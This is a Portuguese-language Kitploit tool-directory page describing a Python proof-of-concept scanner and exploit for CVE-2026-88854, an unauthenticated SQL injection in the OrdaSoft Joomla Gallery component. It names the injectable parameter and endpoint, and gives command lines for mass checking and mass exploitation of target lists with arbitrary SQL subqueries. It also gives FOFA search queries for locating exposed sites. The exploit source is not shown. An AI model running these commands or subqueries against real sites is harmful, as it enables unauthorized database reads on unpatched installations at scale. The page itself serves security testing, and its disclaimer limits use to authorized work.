Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-88854 — Scanner PoC e exploit em Python 3 para CVE-2026-88854, uma injeção SQL não autenticada no OrdaSoft Joomla Gallery, com modos de verificação em massa e leitura de dados via EXTRACTVALUE. | Kitploit
Ferramentas/GitHubGitHub/murrez/cve-2026-88854
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmurrez/cve-2026-88854

CVE-2026-88854

Scanner PoC e exploit em Python 3 para CVE-2026-88854, uma injeção SQL não autenticada no OrdaSoft Joomla Gallery, com modos de verificação em massa e leitura de dados via EXTRACTVALUE.

Ver Repositório
há 3h 7mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-88854 — Injeção SQL no OrdaSoft Joomla Gallery

Scanner/exploit PoC em Python 3 para CVE-2026-88854 no OrdaSoft OS Responsive Image Gallery para Joomla.

Componentecom_osgallery, com_osgallery_light
Afetado1.0.0 – 6.2.6
Corrigido em6.2.7+
CVSS 4.09.3 (Crítico)
AutenticaçãoNenhuma (mod_osgallery_search público)
CWECWE-89

Resumo

showSearchResult() / showSearchResultAjax() leem textsearch / searchText via $input->getVar(), que não aplica escape SQL adequado. O valor é concatenado em uma cláusula LIKE. Visitantes não autenticados podem usar injeção no estilo UNION para ler o conteúdo do banco de dados.

Superfície de requisição típica:

root@kitploit:~
GET /index.php?option=com_osgallery&task=showSearchResultAjax&format=raw&textsearch=...

Instalações legadas podem usar o nome de task searhResult (erro de digitação).

Requisitos

  • Python 3.9+
  • pip install -r requirements.txt

Uso

root@kitploit:~
pip install -r requirements.txt

# Fingerprint + strict SQLi probe (error / time / EXTRACTVALUE)
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# MySQL error-based read (default subquery: VERSION())
python poc.py -u https://target.example --mode exploit

python poc.py -u https://target.example --mode exploit \
  --subquery "SELECT DATABASE()"

# Mass exploit (writes leaks to exploited.txt, not hits.txt)
python poc.py --list targets.example.txt --mode exploit --threads 5 --quiet \
  --output exploit_results.jsonl --vuln-list exploited.txt

# Re-tier a prior mass check by manifest version (optional)
python audit_scan.py --jsonl cve_2026_88854_results.jsonl

Opções de CLI

Saída (verificação em massa)

ArquivoConteúdo
cve_2026_88854_results.jsonlJSON por alvo
hits.txtURLs candidatas (exploitable_candidate)

Valores comuns de status (check)

Auditoria pós-scan (audit_scan.py)

Após um check em massa, execute audit_scan.py para buscar novamente os manifestos do administrador e dividir os alvos:

A versão da galeria é lida do elemento <version> em administrator/components/com_osgallery/osgallery.xml, não do atributo extension version= do Joomla.

Limitações

  • O modo Exploit usa EXTRACTVALUE baseado em erro do MySQL; MariaDB/Postgres, erros desabilitados ou WAF podem resultar em nenhum vazamento mesmo quando o CVE se aplica.
  • Diferenças de comprimento booleanas sozinhas não são tratadas como SQLi confirmada (ModSecurity 406 causou falsos positivos em testes).
  • Versão do manifesto ≤ 6.2.6 indica janela de exposição, não SQLi garantidamente explorável em todos os hosts.
  • Instalações Joomla em subdiretório exigem a URL base correta (ex.: https://host/site).

Dicas de FOFA / descoberta

root@kitploit:~
app="Joomla" && body="com_osgallery"
body="/images/com_osgallery/"

Estrutura do repositório

root@kitploit:~
.
├── poc.py
├── audit_scan.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Listas de alvos locais e artefatos de execução (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) estão em .gitignore e não devem ser commitados.

Referências

  • NVD — CVE-2026-88854
  • OrdaSoft Joomla Gallery

Legal

Apenas para testes de segurança autorizados. Você é responsável pelo cumprimento das leis aplicáveis e das regras do programa.

Baixar ferramenta
OpçãoDescrição
-u, --urlURL base de um único alvo (instalações em subdiretório: incluir o caminho)
--listArquivo de lista de alvos (uma URL por linha)
--modecheck ou exploit
--subquerySQL dentro de EXTRACTVALUE (modo exploit, padrão SELECT VERSION())
--threads, -jConcorrência em massa (padrão 20)
--timeoutTimeout HTTP em segundos (padrão 20)
--proxyURL de proxy HTTP(S)
--outputResultados JSONL (padrão cve_2026_88854_results.jsonl)
--vuln-listCheck → hits.txt; exploit → exploited.txt
--quiet, -qMenos saída de progresso
StatusSignificado
sqli_confirmedSQLi baseada em erro/tempo ou vazamento EXTRACTVALUE verificado
likely_vulnerable_versionVersão do manifesto ≤ 6.2.6 + endpoint de busca
likely_componentGaleria detectada, versão desconhecida
boolean_inconclusiveApenas diferença no comprimento da resposta (frequentemente WAF); não contabilizado como confirmado
patched_versionVersão do manifesto > 6.2.6
component_no_search_endpointComponente presente, task de busca inacessível
no_componentcom_osgallery não detectado
ArquivoConteúdo
hits_version_lte_626.txtVersão da galeria no manifesto ≤ 6.2.6
hits_component_endpoint.txtGaleria + endpoint, versão ilegível
hits_patched.txtManifesto > 6.2.6
fofa_stale.txtSem componente (linha FOFA desatualizada)
cve_2026_88854_audit.jsonlJSONL enriquecido